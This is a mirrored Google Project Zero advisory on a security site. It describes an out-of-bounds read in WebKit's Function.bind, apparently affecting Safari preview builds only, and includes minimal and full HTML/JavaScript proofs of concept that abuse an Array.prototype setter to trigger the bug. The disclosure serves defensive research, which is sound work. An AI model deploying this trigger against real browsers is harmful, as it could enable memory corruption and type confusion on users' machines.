首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple Safari - Out-of-Bounds Read when Calling Bound Function
来源:Google Security Research 作者:Google 发布时间:2017-03-28  
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033
 
There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.
 
This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.
 
This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.
 
 
A minimal PoC is as follows, and a full PoC is attached.
 
 
var ba;
 
function s(){
    ba = this;
}
 
 
function dummy(){
    alert("just a function");
}
 
 
Object.defineProperty(Array.prototype, "0", {set : s });
var f = dummy.bind({}, 1, 2, 3, 4);
ba.length = 100000;
f(1, 2, 3);
-->
 
<html>
<body>
<script>
 
var ba;
 
function s(){
    alert("in s");
    ba = this;
}
 
 
function g(){
    alert("in g");
    return 7;
}
 
 
function dummy(){
    alert("just a function");
}
 
alert("start");
 
try{
Object.defineProperty(Array.prototype, "0", {set : s, get : g});
var f = dummy.bind({}, 1, 2, 3, 4);
alert("ba" + ba);
ba.length = 100000;
f(1, 2, 3);
}catch(e){
 
    alert(e.message);
 
}
 
</script>
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Safari - Builtin JavaScr
·Github Enterprise - Default Se
·Apple Safari - 'DateTimeFormat
·QNAP QTS < 4.2.4 - Domain Priv
·Samba 4.5.2 - Symlink Race Per
·DzSoft PHP Editor 4.2.7 - File
·Internet Information Services
·MikroTik RouterBoard 6.38.5 -
·Microsoft Visual Studio 2015 u
·Intermec PM43 Industrial Print
·FTPShell Server 6.56 Import CS
·VX Search Enterprise 9.5.12 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved